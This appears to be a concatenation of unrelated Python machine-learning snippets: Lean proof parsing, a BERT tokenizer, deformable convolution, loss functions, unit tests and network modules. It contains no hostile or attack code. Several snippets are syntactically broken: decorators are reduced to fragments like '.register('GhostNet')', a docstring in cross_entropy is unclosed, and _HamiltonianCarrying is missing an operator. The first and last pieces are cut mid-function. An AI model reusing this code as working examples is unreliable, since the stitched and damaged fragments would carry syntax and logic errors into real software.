node['tactic'] = self.extract_ast(ast.tactic, proof_key=proof_key, parent_key=key, parent_type=node['node_type'], index=0)
elif isinstance(ast, AST.TacticParam):
node['node_type'] = 'tactic_arg'
node['node_subtype'] = 'expression'
else:
raise Exception(ast)
node['key'] = row['key'] = f"{row['filename']}:{row['line']}:{row['column']}"
row['class'] = node['node_subtype']
if (node['node_type'] == 'proof'):
self.proof_table.append(row)
elif (node['node_type'] == 'tactic'):
row['proof_key'] = proof_key
if ((row['filename'], row['start_line'], row['start_column'], infix_key) in self.tactic_pos_trace_keys):
trace_key = self.tactic_pos_trace_keys[(row['filename'], row['start_line'], row['start_column'], infix_key)]
self.processed_tactics.add(trace_key)
row['trace_key'] = trace_key
else:
row['trace_key'] = ''
self.tactic_table.append(row)
elif (node['node_type'] == 'tactic_arg'):
self.arg_table.append(row)
return node
def extract_proof_ast(self, ast: Union[(AST.ByProof, AST.BeginProof, AST.BracketProof)]) -> Dict[(str, Any)]:
return self.extract_ast(ast, proof_key=f'{self.relative_file_path}:{(ast.line + 1)}:{(ast.column + 1)}', parent_key='', parent_type='', index=0)
def run(self):
self.build_tactic_pos_data()
self.build_tactic_data()
self.build_parser_hints()
for key in self.tactics_to_process:
if (key in self.processed_tactics):
continue
tac = self.tactic_data[key]
try:
parser = LeanParser(self.lean_file, (tac['preceeding_line'] - 1), (tac['preceeding_column'] - 1), parameter_positions=self.parameter_positions, tactic_block_positions=self.tactic_block_positions)
if (tac['preceeding_symbol'] == 'by'):
parser_ast = parser.read_by()
elif (tac['preceeding_symbol'] == 'begin'):
parser_ast = parser.read_begin()
elif (tac['preceeding_symbol'] == '{'):
parser_ast = parser.read_bracket_proof()
else:
raise Exception(f'This tactic should already have been processed: {tac}')
proof_tree = self.extract_proof_ast(parser_ast)
self.proof_trees.append(proof_tree)
except Exception:
print(self.lean_file.filename)
traceback.print_exc() |
class AveragePooling3D(ZooKerasLayer):
def __init__(self, pool_size=(2, 2, 2), strides=None, border_mode='valid', dim_ordering='th', input_shape=None, **kwargs):
if (border_mode != 'valid'):
invalidInputError(False, "For AveragePooling3D, only border_mode='valid' is supported for now")
super(AveragePooling3D, self).__init__(None, pool_size, strides, dim_ordering, (list(input_shape) if input_shape else None), **kwargs) |
def _unflatten_dense_tensors(flat, tensors):
outputs = []
offset = 0
for tensor in tensors:
numel = tensor.numel()
outputs.append(flat.narrow(0, offset, numel).view_as(tensor))
offset += numel
return tuple(outputs) |
def mel_spectrogram_torch_data(y, data):
return mel_spectrogram_torch(y, data.filter_length, data.n_mel_channels, data.sampling_rate, data.hop_length, data.win_length, data.mel_fmin, data.mel_fmax, center=False) |
def cross_entropy(logits, target, weight=None, ignore_index=(- 100), reduction='mean', smooth_eps=None, smooth_dist=None):
'cross entropy loss, with support for target distributions and label smoothing
smooth_eps = (smooth_eps or 0)
if (_is_long(target) and (smooth_eps == 0)):
return F.cross_entropy(logits, target, weight, ignore_index=ignore_index, reduction=reduction)
masked_indices = None
num_classes = logits.size((- 1))
if (_is_long(target) and (ignore_index >= 0)):
masked_indices = target.eq(ignore_index)
if ((smooth_eps > 0) and (smooth_dist is not None)):
if _is_long(target):
target = onehot(target, num_classes).type_as(logits)
if (smooth_dist.dim() < target.dim()):
smooth_dist = smooth_dist.unsqueeze(0)
target.lerp_(smooth_dist, smooth_eps)
lsm = F.log_softmax(logits, dim=(- 1))
if (weight is not None):
lsm = (lsm * weight.unsqueeze(0))
if _is_long(target):
eps = (smooth_eps / (num_classes - 1))
nll = (- lsm.gather(dim=(- 1), index=target.unsqueeze((- 1))))
loss = (((1.0 - (2 * eps)) * nll) - (eps * lsm.sum((- 1))))
else:
loss = (- (target * lsm).sum((- 1)))
if (masked_indices is not None):
loss.masked_fill_(masked_indices, 0)
if (reduction == 'sum'):
loss = loss.sum()
elif (reduction == 'mean'):
if (masked_indices is None):
loss = loss.mean()
else:
loss = (loss.sum() / float((loss.size(0) - masked_indices.sum())))
return loss |
def set_restricted_game_conversions_for_all_workers_openspiel(trainer: Trainer, tmp_base_env: MultiAgentEnv, delegate_policy_id: PolicyID, agent_id_to_restricted_game_specs: Dict[(AgentID, List[StrategySpec])], load_policy_spec_fn):
local_delegate_policy = trainer.workers.local_worker().policy_map[delegate_policy_id]
player_converters = {}
for (p, restricted_game_specs) in agent_id_to_restricted_game_specs.items():
if (len(restricted_game_specs) == 0):
continue
player_converters[p] = get_restricted_game_obs_conversions(player=p, delegate_policy=local_delegate_policy, policy_specs=restricted_game_specs, load_policy_spec_fn=load_policy_spec_fn, tmp_base_env=tmp_base_env)
assert ((len(player_converters) == 0) or (len(player_converters) == 1))
def _set_worker_converters(worker: RolloutWorker):
worker_delegate_policy = worker.policy_map[delegate_policy_id]
for (p, player_converter) in player_converters.items():
worker.foreach_env((lambda env: env.set_obs_conversion_dict(p, player_converter)))
worker_delegate_policy.player_converters = player_converters
trainer.workers.foreach_worker(_set_worker_converters)
trainer.get_local_converters = (lambda : trainer.workers.local_worker().policy_map[delegate_policy_id].player_converters) |
class MLP(nn.Module):
def __init__(self, ninput=200, nhidden=150, nclass=2, dropout=0):
super(MLP, self).__init__()
self.fc1 = nn.Linear(ninput, nhidden)
self.fc2 = nn.Linear(nhidden, nclass)
self.dropout = dropout
def forward(self, x):
out = F.relu(self.fc1(x))
out = F.dropout(out, self.dropout)
out = self.fc2(out)
return out |
def get_config(parse=True, **optional_kwargs):
parser = argparse.ArgumentParser()
parser.add_argument('--mode', type=str, default='train')
parser.add_argument('--verbose', type=str2bool, default='true')
parser.add_argument('--preprocessed', type=str2bool, default='True')
parser.add_argument('--video_type', type=str, default='360airballoon')
parser.add_argument('--input_size', type=int, default=2048)
parser.add_argument('--hidden_size', type=int, default=500)
parser.add_argument('--num_layers', type=int, default=2)
parser.add_argument('--summary_rate', type=float, default=0.3)
parser.add_argument('--n_epochs', type=int, default=50)
parser.add_argument('--clip', type=float, default=5.0)
parser.add_argument('--lr', type=float, default=0.0001)
parser.add_argument('--discriminator_lr', type=float, default=1e-05)
parser.add_argument('--discriminator_slow_start', type=int, default=15)
parser.add_argument('--epoch', type=int, default=2)
if parse:
kwargs = parser.parse_args()
else:
kwargs = parser.parse_known_args()[0]
kwargs = vars(kwargs)
kwargs.update(optional_kwargs)
return Config(**kwargs) |
class DeformConvFunction(Function):
def forward(ctx, input, offset, weight, stride=1, padding=0, dilation=1, groups=1, deformable_groups=1, im2col_step=64):
if ((input is not None) and (input.dim() != 4)):
raise ValueError('Expected 4D tensor as input, got {}D tensor instead.'.format(input.dim()))
ctx.stride = _pair(stride)
ctx.padding = _pair(padding)
ctx.dilation = _pair(dilation)
ctx.groups = groups
ctx.deformable_groups = deformable_groups
ctx.im2col_step = im2col_step
ctx.save_for_backward(input, offset, weight)
output = input.new_empty(DeformConvFunction._output_size(input, weight, ctx.padding, ctx.dilation, ctx.stride))
ctx.bufs_ = [input.new_empty(0), input.new_empty(0)]
if (not input.is_cuda):
raise NotImplementedError
else:
cur_im2col_step = min(ctx.im2col_step, input.shape[0])
assert ((input.shape[0] % cur_im2col_step) == 0), 'im2col step must divide batchsize'
_C.deform_conv_forward(input, weight, offset, output, ctx.bufs_[0], ctx.bufs_[1], weight.size(3), weight.size(2), ctx.stride[1], ctx.stride[0], ctx.padding[1], ctx.padding[0], ctx.dilation[1], ctx.dilation[0], ctx.groups, ctx.deformable_groups, cur_im2col_step)
return output
_differentiable
def backward(ctx, grad_output):
(input, offset, weight) = ctx.saved_tensors
grad_input = grad_offset = grad_weight = None
if (not grad_output.is_cuda):
raise NotImplementedError
else:
cur_im2col_step = min(ctx.im2col_step, input.shape[0])
assert ((input.shape[0] % cur_im2col_step) == 0), 'im2col step must divide batchsize'
if (ctx.needs_input_grad[0] or ctx.needs_input_grad[1]):
grad_input = torch.zeros_like(input)
grad_offset = torch.zeros_like(offset)
_C.deform_conv_backward_input(input, offset, grad_output, grad_input, grad_offset, weight, ctx.bufs_[0], weight.size(3), weight.size(2), ctx.stride[1], ctx.stride[0], ctx.padding[1], ctx.padding[0], ctx.dilation[1], ctx.dilation[0], ctx.groups, ctx.deformable_groups, cur_im2col_step)
if ctx.needs_input_grad[2]:
grad_weight = torch.zeros_like(weight)
_C.deform_conv_backward_parameters(input, offset, grad_output, grad_weight, ctx.bufs_[0], ctx.bufs_[1], weight.size(3), weight.size(2), ctx.stride[1], ctx.stride[0], ctx.padding[1], ctx.padding[0], ctx.dilation[1], ctx.dilation[0], ctx.groups, ctx.deformable_groups, 1, cur_im2col_step)
return (grad_input, grad_offset, grad_weight, None, None, None, None, None)
def _output_size(input, weight, padding, dilation, stride):
channels = weight.size(0)
output_size = (input.size(0), channels)
for d in range((input.dim() - 2)):
in_size = input.size((d + 2))
pad = padding[d]
kernel = ((dilation[d] * (weight.size((d + 2)) - 1)) + 1)
stride_ = stride[d]
output_size += (((((in_size + (2 * pad)) - kernel) // stride_) + 1),)
if (not all(map((lambda s: (s > 0)), output_size))):
raise ValueError('convolution input is too small (output would be {})'.format('x'.join(map(str, output_size))))
return output_size |
class LinearResidual(nn.Module):
def __init__(self, input_size=1024, output_size=1024, n_resmods=1, dropout=False):
super(LinearResidual, self).__init__()
thisname = self.__class__.__name__
self.dropout_prob = 0.5
self.n_mods = n_resmods
print('[INFO] ({}) Initializing module'.format(thisname))
print('[INFO] ({}) Using dropout? {}'.format(thisname, dropout))
print('[INFO] ({}) Dropout val {}'.format(thisname, self.dropout_prob))
print('[INFO] ({}) N of inner layers {}'.format(thisname, n_resmods))
layers = [nn.Linear(input_size, output_size), nn.BatchNorm1d(output_size), nn.ReLU(inplace=True)]
if dropout:
layers += [nn.Dropout(p=self.dropout_prob)]
for i in range(1, n_resmods):
layers += [nn.Linear(input_size, output_size), nn.BatchNorm1d(output_size), nn.ReLU(inplace=True)]
if dropout:
layers += [nn.Dropout(p=self.dropout_prob)]
self.back = nn.Sequential(*layers)
self.relu = nn.ReLU()
Utils.normal_init(self.back)
def forward(self, x):
y = self.back(x)
x = self.relu((x + y))
return x |
class BertTokenizer(PreTrainedTokenizer):
vocab_files_names = VOCAB_FILES_NAMES
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
pretrained_init_configuration = PRETRAINED_INIT_CONFIGURATION
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
def __init__(self, vocab_file, do_lower_case=True, do_basic_tokenize=True, never_split=None, unk_token='[UNK]', sep_token='[SEP]', pad_token='[PAD]', cls_token='[CLS]', mask_token='[MASK]', tokenize_chinese_chars=True, strip_accents=None, **kwargs):
super().__init__(do_lower_case=do_lower_case, do_basic_tokenize=do_basic_tokenize, never_split=never_split, unk_token=unk_token, sep_token=sep_token, pad_token=pad_token, cls_token=cls_token, mask_token=mask_token, tokenize_chinese_chars=tokenize_chinese_chars, strip_accents=strip_accents, **kwargs)
if (not os.path.isfile(vocab_file)):
raise ValueError(f"Can't find a vocabulary file at path '{vocab_file}'. To load the vocabulary from a Google pretrained model use `tokenizer = BertTokenizer.from_pretrained(PRETRAINED_MODEL_NAME)`")
self.vocab = load_vocab(vocab_file)
self.ids_to_tokens = collections.OrderedDict([(ids, tok) for (tok, ids) in self.vocab.items()])
self.do_basic_tokenize = do_basic_tokenize
if do_basic_tokenize:
self.basic_tokenizer = BasicTokenizer(do_lower_case=do_lower_case, never_split=never_split, tokenize_chinese_chars=tokenize_chinese_chars, strip_accents=strip_accents)
self.wordpiece_tokenizer = WordpieceTokenizer(vocab=self.vocab, unk_token=self.unk_token)
def do_lower_case(self):
return self.basic_tokenizer.do_lower_case
def vocab_size(self):
return len(self.vocab)
def get_vocab(self):
return dict(self.vocab, **self.added_tokens_encoder)
def _tokenize(self, text):
split_tokens = []
if self.do_basic_tokenize:
for token in self.basic_tokenizer.tokenize(text, never_split=self.all_special_tokens):
if (token in self.basic_tokenizer.never_split):
split_tokens.append(token)
else:
split_tokens += self.wordpiece_tokenizer.tokenize(token)
else:
split_tokens = self.wordpiece_tokenizer.tokenize(text)
return split_tokens
def _convert_token_to_id(self, token):
return self.vocab.get(token, self.vocab.get(self.unk_token))
def _convert_id_to_token(self, index):
return self.ids_to_tokens.get(index, self.unk_token)
def convert_tokens_to_string(self, tokens):
out_string = ' '.join(tokens).replace(' ##', '').strip()
return out_string
def build_inputs_with_special_tokens(self, token_ids_0: List[int], token_ids_1: Optional[List[int]]=None) -> List[int]:
if (token_ids_1 is None):
return (([self.cls_token_id] + token_ids_0) + [self.sep_token_id])
cls = [self.cls_token_id]
sep = [self.sep_token_id]
return ((((cls + token_ids_0) + sep) + token_ids_1) + sep)
def get_special_tokens_mask(self, token_ids_0: List[int], token_ids_1: Optional[List[int]]=None, already_has_special_tokens: bool=False) -> List[int]:
if already_has_special_tokens:
return super().get_special_tokens_mask(token_ids_0=token_ids_0, token_ids_1=token_ids_1, already_has_special_tokens=True)
if (token_ids_1 is not None):
return (((([1] + ([0] * len(token_ids_0))) + [1]) + ([0] * len(token_ids_1))) + [1])
return (([1] + ([0] * len(token_ids_0))) + [1])
def create_token_type_ids_from_sequences(self, token_ids_0: List[int], token_ids_1: Optional[List[int]]=None) -> List[int]:
sep = [self.sep_token_id]
cls = [self.cls_token_id]
if (token_ids_1 is None):
return (len(((cls + token_ids_0) + sep)) * [0])
return ((len(((cls + token_ids_0) + sep)) * [0]) + (len((token_ids_1 + sep)) * [1]))
def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str]=None) -> Tuple[str]:
index = 0
if os.path.isdir(save_directory):
vocab_file = os.path.join(save_directory, (((filename_prefix + '-') if filename_prefix else '') + VOCAB_FILES_NAMES['vocab_file']))
else:
vocab_file = (((filename_prefix + '-') if filename_prefix else '') + save_directory)
with open(vocab_file, 'w', encoding='utf-8') as writer:
for (token, token_index) in sorted(self.vocab.items(), key=(lambda kv: kv[1])):
if (index != token_index):
logger.warning(f'Saving vocabulary to {vocab_file}: vocabulary indices are not consecutive. Please check that the vocabulary is not corrupted!')
index = token_index
writer.write((token + '\n'))
index += 1
return (vocab_file,) |
.register('GhostNet')
def build_ghostnet_backbone(cfg):
in_channels = cfg.MODEL.BACKBONE.IN_PLANES
base_channels = cfg.MODEL.BACKBONE.BASE_PLANES
width_multiplier = cfg.MODEL.COMPRESSION.WIDTH_MULTIPLIER
round_nearest = cfg.MODEL.COMPRESSION.ROUND_NEAREST
attention_type = cfg.MODEL.ATTENTION.ATTENTION_TYPE
conv_layer = get_conv(cfg)
norm_layer = get_norm(cfg)
act_layer = get_act(cfg)
sigmoid_type = cfg.MODEL.ACT.SIGMOID_TYPE
return GhostBackbone(in_channels=in_channels, base_channels=base_channels, width_multiplier=width_multiplier, round_nearest=round_nearest, attention_type=attention_type, sigmoid_type=sigmoid_type, conv_layer=conv_layer, norm_layer=norm_layer, act_layer=act_layer) |
def test(test_loader, model, epoch):
model.eval()
Eval = Eval_thread()
n = 0
mae_ls = []
fmax_ls = []
with torch.no_grad():
for (j_batch, test_data) in enumerate(test_loader):
X_test = Variable(test_data[0])
y_test = Variable(test_data[1])
X_test = X_test.cuda()
y_test = y_test.cuda()
if (X_test.shape[1] == 1):
X_test = torch.cat([X_test, X_test, X_test], 1)
(_, output_test) = model(X_test)
pred = bv_test(output_test)
pred = F.upsample(pred, size=(y_test.shape[2], y_test.shape[3]), mode='bilinear', align_corners=False)
for im in range(y_test.shape[0]):
(mae, fmax) = Eval.run(pred[im], y_test[im])
mae_ls.append(mae)
fmax_ls.append(fmax)
if ((j_batch % 100) == 0):
print((((('test [Iteration : ' + str(j_batch)) + '/') + str(len(test_loader))) + ('] fmax:%.3f mae:%.3f' % (np.mean(fmax_ls), np.mean(mae_ls)))))
csv = 'results.csv'
with open(os.path.join('save', csv), 'a') as f:
f.write(('%03d,%0.6f,%0.5f \n' % ((epoch + 1), np.mean(mae_ls), np.mean(fmax_ls))))
return np.mean(mae_ls) |
def remove_punctuation(x):
x = ''.join([c for c in x if (c not in string.punctuation)])
x = [s for s in x.split() if s]
x = ' '.join(x)
return x |
def VarLSTMCell(input, hidden, w_ih, w_hh, b_ih=None, b_hh=None, noise_in=None, noise_hidden=None):
input = (input.expand(4, *input.size()) if (noise_in is None) else (input.unsqueeze(0) * noise_in))
(hx, cx) = hidden
hx = (hx.expand(4, *hx.size()) if (noise_hidden is None) else (hx.unsqueeze(0) * noise_hidden))
gates = (torch.baddbmm(b_ih.unsqueeze(1), input, w_ih) + torch.baddbmm(b_hh.unsqueeze(1), hx, w_hh))
(ingate, forgetgate, cellgate, outgate) = gates
ingate = torch.sigmoid(ingate)
forgetgate = torch.sigmoid(forgetgate)
cellgate = torch.tanh(cellgate)
outgate = torch.sigmoid(outgate)
cy = ((forgetgate * cx) + (ingate * cellgate))
hy = (outgate * torch.tanh(cy))
return (hy, cy) |
class TranslationEnToDePipelineTests(MonoInputPipelineCommonMixin, unittest.TestCase):
pipeline_task = 'translation_en_to_de'
small_models = ['patrickvonplaten/t5-tiny-random']
large_models = [None]
invalid_inputs = [4, '<mask>']
mandatory_keys = ['translation_text'] |
class PabeeTests(TestCasePlus):
def test_run_glue(self):
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
tmp_dir = self.get_auto_remove_tmp_dir()
testargs = f'''
run_glue_with_pabee.py
--model_type albert
--model_name_or_path albert-base-v2
--data_dir ./tests/fixtures/tests_samples/MRPC/
--output_dir {tmp_dir}
--overwrite_output_dir
--task_name mrpc
--do_train
--do_eval
--per_gpu_train_batch_size=2
--per_gpu_eval_batch_size=1
--learning_rate=2e-5
--max_steps=50
--warmup_steps=2
--seed=42
--max_seq_length=128
'''.split()
with patch.object(sys, 'argv', testargs):
result = run_glue_with_pabee.main()
for value in result.values():
self.assertGreaterEqual(value, 0.75) |
def test_get_git_hash():
with patch('mmcv.utils.version_utils._minimal_ext_cmd', _mock_cmd_success):
assert (get_git_hash() == '3b46d33e90c397869adfdfc9812aa0')
assert (get_git_hash(digits=6) == '3b46d3')
assert (get_git_hash(digits=100) == get_git_hash())
with patch('mmcv.utils.version_utils._minimal_ext_cmd', _mock_cmd_fail):
assert (get_git_hash() == 'unknown')
assert (get_git_hash(fallback='n/a') == 'n/a') |
class Rag(object):
def __init__(self, labels: np.ndarray, connectivity: int=1):
self.labels = labels
self.graph = fast_rag(labels, connectivity)
self.tree = tree.Ultrametric(init_nodes=self.graph.nodes())
def merge_subgraph(self, subgraph: Iterable={}, source: int=None):
subgraph = self.graph.subgraph(subgraph)
if (len(subgraph) == 0):
return
for connected_subgraph in (self.graph.subgraph(c) for c in nx.connected_components(subgraph)):
ordered_nodes = nx.dfs_preorder_nodes(connected_subgraph, source)
current_node = next(ordered_nodes)
for next_node in ordered_nodes:
current_node = self.tree.merge(current_node, next_node)
def current_segmentation(self, cut_threshold: float=np.inf) -> np.ndarray:
label_map = self.tree.get_map(cut_threshold)
return label_map[self.labels] |
def test_dcn_center_head():
if (not torch.cuda.is_available()):
pytest.skip('test requires GPU and CUDA')
set_random_seed(0)
tasks = [dict(num_class=1, class_names=['car']), dict(num_class=2, class_names=['truck', 'construction_vehicle']), dict(num_class=2, class_names=['bus', 'trailer']), dict(num_class=1, class_names=['barrier']), dict(num_class=2, class_names=['motorcycle', 'bicycle']), dict(num_class=2, class_names=['pedestrian', 'traffic_cone'])]
voxel_size = [0.2, 0.2, 8]
dcn_center_head_cfg = dict(type='CenterHead', in_channels=sum([128, 128, 128]), tasks=[dict(num_class=1, class_names=['car']), dict(num_class=2, class_names=['truck', 'construction_vehicle']), dict(num_class=2, class_names=['bus', 'trailer']), dict(num_class=1, class_names=['barrier']), dict(num_class=2, class_names=['motorcycle', 'bicycle']), dict(num_class=2, class_names=['pedestrian', 'traffic_cone'])], common_heads={'reg': (2, 2), 'height': (1, 2), 'dim': (3, 2), 'rot': (2, 2), 'vel': (2, 2)}, share_conv_channel=64, bbox_coder=dict(type='CenterPointBBoxCoder', post_center_range=[(- 61.2), (- 61.2), (- 10.0), 61.2, 61.2, 10.0], max_num=500, score_threshold=0.1, pc_range=[(- 51.2), (- 51.2)], out_size_factor=4, voxel_size=voxel_size[:2], code_size=9), separate_head=dict(type='DCNSeparateHead', dcn_config=dict(type='DCN', in_channels=64, out_channels=64, kernel_size=3, padding=1, groups=4, bias=False), init_bias=(- 2.19), final_kernel=3), loss_cls=dict(type='GaussianFocalLoss', reduction='mean'), loss_bbox=dict(type='L1Loss', reduction='none', loss_weight=0.25), norm_bbox=True)
train_cfg = dict(grid_size=[512, 512, 1], point_cloud_range=[(- 51.2), (- 51.2), (- 5.0), 51.2, 51.2, 3.0], voxel_size=voxel_size, out_size_factor=4, dense_reg=1, gaussian_overlap=0.1, max_objs=500, min_radius=2, code_weights=[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.2, 0.2, 1.0, 1.0])
test_cfg = dict(post_center_limit_range=[(- 61.2), (- 61.2), (- 10.0), 61.2, 61.2, 10.0], max_per_img=500, max_pool_nms=False, min_radius=[4, 12, 10, 1, 0.85, 0.175], post_max_size=83, score_threshold=0.1, pc_range=[(- 51.2), (- 51.2)], out_size_factor=4, voxel_size=voxel_size[:2], nms_type='circle')
dcn_center_head_cfg.update(train_cfg=train_cfg, test_cfg=test_cfg)
dcn_center_head = build_head(dcn_center_head_cfg).cuda()
x = torch.ones([2, 384, 128, 128]).cuda()
output = dcn_center_head([x])
for i in range(6):
assert (output[i][0]['reg'].shape == torch.Size([2, 2, 128, 128]))
assert (output[i][0]['height'].shape == torch.Size([2, 1, 128, 128]))
assert (output[i][0]['dim'].shape == torch.Size([2, 3, 128, 128]))
assert (output[i][0]['rot'].shape == torch.Size([2, 2, 128, 128]))
assert (output[i][0]['vel'].shape == torch.Size([2, 2, 128, 128]))
assert (output[i][0]['heatmap'].shape == torch.Size([2, tasks[i]['num_class'], 128, 128]))
gt_bboxes_0 = LiDARInstance3DBoxes(torch.rand([10, 9]).cuda(), box_dim=9)
gt_bboxes_1 = LiDARInstance3DBoxes(torch.rand([20, 9]).cuda(), box_dim=9)
gt_labels_0 = torch.randint(1, 11, [10]).cuda()
gt_labels_1 = torch.randint(1, 11, [20]).cuda()
gt_bboxes_3d = [gt_bboxes_0, gt_bboxes_1]
gt_labels_3d = [gt_labels_0, gt_labels_1]
loss = dcn_center_head.loss(gt_bboxes_3d, gt_labels_3d, output)
for (key, item) in loss.items():
if ('heatmap' in key):
assert (item >= 0)
else:
assert (torch.sum(item) >= 0)
img_metas = [dict(box_type_3d=LiDARInstance3DBoxes), dict(box_type_3d=LiDARInstance3DBoxes)]
ret_lists = dcn_center_head.get_bboxes(output, img_metas)
for ret_list in ret_lists:
assert (ret_list[0].tensor.shape[0] <= 500)
assert (ret_list[1].shape[0] <= 500)
assert (ret_list[2].shape[0] <= 500) |
def gradient_check():
kernel_size_list = [1, 3]
len_list = [8, 10]
for i in range(10):
B = random.randint(1, 4)
C = (i + 1)
K = random.choice(kernel_size_list)
H = random.choice(len_list)
W = random.choice(len_list)
input = torch.randn(B, C, ((H + K) - 1), ((W + K) - 1), requires_grad=True).cuda()
kernel = torch.randn(B, ((C * K) * K), H, W, requires_grad=True).cuda()
print(torch.autograd.gradcheck(KernelConv2DFunction(K), (input, kernel), eps=0.1, atol=1e-05, rtol=0.001, raise_exception=True)) |
class LogisticRegressionNetwork(Model):
def __init__(self) -> None:
super().__init__()
self.dense1 = Dense(1)
self.dense2 = Dense(1)
self.sigmoid = tf.nn.sigmoid
def call(self, x1, x2):
x1 = self.dense1(x1)
x2 = self.dense2(x2)
x = tf.stack([x1, x2])
x = tf.reduce_sum(x, 0)
x = self.sigmoid(x)
return x |
class ClevrQuestion(torch.utils.data.Dataset):
def __init__(self, img_folder, ann_file, transforms):
super(ClevrQuestion, self).__init__()
self.transforms = transforms
self.root = img_folder
with open(ann_file, 'r') as f:
self.questions = json.load(f)['questions']
def __len__(self):
return len(self.questions)
def __getitem__(self, idx):
question = self.questions[idx]
img = Image.open(os.path.join(self.root, question['image_filename'])).convert('RGB')
target = {'questionId': (question['question_index'] if ('question_index' in question) else idx), 'caption': question['question']}
if ('answer' in question):
target = _encode_answer(target, question['answer'])
if (self.transforms is not None):
(img, _) = self.transforms(img, {'boxes': torch.zeros(0, 4), 'labels': torch.zeros(0), 'iscrowd': torch.zeros(0), 'positive_map': torch.zeros(0)})
return (img, target) |
def read_rdf(fp):
with open(fp, 'r', encoding='utf-8') as f:
lines = f.readlines()
items = [line.strip().split('\t') for line in lines]
return items |
def draw_in_poincare_ball(embeddings: np.ndarray, label: Optional[np.ndarray]=None, dim: int=2, reduce_method: str='pca', cmap='viridis') -> plt.figure:
emb_low = project_to_poincare_ball(embeddings, dim, reduce_method)
if (dim == 2):
plot_2d_embedding(emb_low, label, cmap=cmap)
elif (dim == 3):
plot_3d_embedding(emb_low, label, cmap=cmap)
else:
raise ValueError('dim must be 2 or 3.') |
def resnet_v2_50(inputs, num_classes=None, is_training=True, global_pool=True, output_stride=None, centered_stride=False, reuse=None, scope='resnet_v2_50'):
c = [False, False, False]
if centered_stride:
i_last = (int(np.round(np.log2(output_stride))) - 3)
if (i_last >= 0):
c[i_last] = True
blocks = [resnet_v2_block('block1', base_depth=64, num_units=3, stride=2, centered_stride=c[0]), resnet_v2_block('block2', base_depth=128, num_units=4, stride=2, centered_stride=c[1]), resnet_v2_block('block3', base_depth=256, num_units=6, stride=2, centered_stride=c[2]), resnet_v2_block('block4', base_depth=512, num_units=3, stride=1)]
return resnet_v2(inputs, blocks, num_classes, is_training, global_pool, output_stride, include_root_block=True, reuse=reuse, scope=scope) |
class Zencoder(nn.Module):
def __init__(self, input_nc, ngf=64, norm='instance', act='LeakyReLU', use_spect=True):
super(Zencoder, self).__init__()
norm_layer = get_norm_layer(norm_type=norm)
acti = get_nonlinearity_layer(activation_type=act)
self.block0 = EncoderBlock(input_nc, (ngf * 2), norm_layer, acti, use_spect)
self.block1 = EncoderBlock((ngf * 2), (ngf * 4), norm_layer, acti, use_spect)
self.block2 = EncoderBlock((ngf * 4), (ngf * 4), norm_layer, acti, use_spect)
self.block3 = EncoderBlock((ngf * 4), (ngf * 4), norm_layer, acti, use_spect)
self.block4 = ResBlockDecoder((ngf * 4), (ngf * 4), (ngf * 4), norm_layer, acti, use_spect)
self.block5 = ResBlockDecoder((ngf * 4), (ngf * 4), (ngf * 4), norm_layer, acti, use_spect)
self.down = nn.Upsample(scale_factor=0.25, mode='nearest')
self.get_code = nn.Sequential(nn.Conv2d(256, 256, kernel_size=1, padding=0), nn.Tanh())
def forward(self, input, seg):
out = self.block0(input)
out = self.block3(self.block2(self.block1(out)))
out = self.block5(self.block4(out))
codes = self.get_code(out)
segmap = F.interpolate(seg, size=codes.size()[2:], mode='nearest')
bs = codes.shape[0]
hs = codes.shape[2]
ws = codes.shape[3]
cs = codes.shape[1]
f_size = cs
s_size = segmap.shape[1]
codes_vector = torch.zeros((bs, (s_size + 1), cs), dtype=codes.dtype, device=codes.device)
exist_vector = torch.zeros((bs, s_size), dtype=codes.dtype, device=codes.device)
for i in range(bs):
for j in range(s_size):
component_mask_area = torch.sum(segmap.bool()[(i, j)])
if (component_mask_area > 0):
codes_component_feature = codes[i].masked_select(segmap.bool()[(i, j)]).reshape(f_size, component_mask_area).mean(1)
codes_vector[i][j] = codes_component_feature
exist_vector[i][j] = 1
(tmpmean, tmpstd) = calc_mean_std(codes[i].reshape(1, codes[i].shape[0], codes[i].shape[1], codes[i].shape[2]))
codes_vector[i][s_size] = tmpmean.squeeze()
return (codes_vector, exist_vector, out) |
def _HamiltonianCarrying(q, p, g, s):
for t in range(10):
(q, p, g) = [(q + (0.1 * _dp_Hqp(q, p, s))), (p - (0.1 * _dq_Hqp(q, p, s))), (g + ((0.1 * _k(g, q, s)) p))]
return (q, p, g) |
def write_demo(fn, data, names, bpm=90.0, shift_second=None, shift_beat=None):
midi = demo_to_midi(data, names, bpm, shift_second, shift_beat)
midi.write(fn) |
class DenseBlock(nn.Module):
def __init__(self, in_channels, out_channels, add_bias=True, use_wscale=True, wscale_gain=_WSCALE_GAIN, lr_mul=1.0, activation_type='lrelu'):
super().__init__()
weight_shape = (out_channels, in_channels)
wscale = (wscale_gain / np.sqrt(in_channels))
if use_wscale:
self.weight = nn.Parameter((torch.randn(*weight_shape) / lr_mul))
self.wscale = (wscale * lr_mul)
else:
self.weight = nn.Parameter(((torch.randn(*weight_shape) * wscale) / lr_mul))
self.wscale = lr_mul
if add_bias:
self.bias = nn.Parameter(torch.zeros(out_channels))
else:
self.bias = None
self.bscale = lr_mul
if (activation_type == 'linear'):
self.activate = nn.Identity()
self.activate_scale = 1.0
elif (activation_type == 'lrelu'):
self.activate = nn.LeakyReLU(negative_slope=0.2, inplace=True)
self.activate_scale = np.sqrt(2.0)
else:
raise NotImplementedError(f'Not implemented activation function: `{activation_type}`!')
def forward(self, x):
if (x.ndim != 2):
x = x.view(x.shape[0], (- 1))
bias = ((self.bias * self.bscale) if (self.bias is not None) else None)
x = F.linear(x, weight=(self.weight * self.wscale), bias=bias)
x = (self.activate(x) * self.activate_scale)
return x |
def test_digits_cosine_greedi_ln_object():
model = GraphCutSelection(100, 'cosine', optimizer=GreeDi(optimizer1='lazy', optimizer2='naive', random_state=0))
model.fit(X_digits)
assert_array_equal(model.ranking, digits_cosine_greedi_ranking)
assert_array_almost_equal(model.gains, digits_cosine_greedi_gains, 4)
assert_array_almost_equal(model.subset, X_digits[model.ranking]) |
def select_skeleton(coords_src, joint_info_src, skeleton_type_dst):
if (skeleton_type_dst == ''):
return coords_src
def get_index(name):
if (((name + '_') + skeleton_type_dst) in joint_info_src.names):
return joint_info_src.names.index((name + '_h36m'))
else:
return joint_info_src.names.index(name)
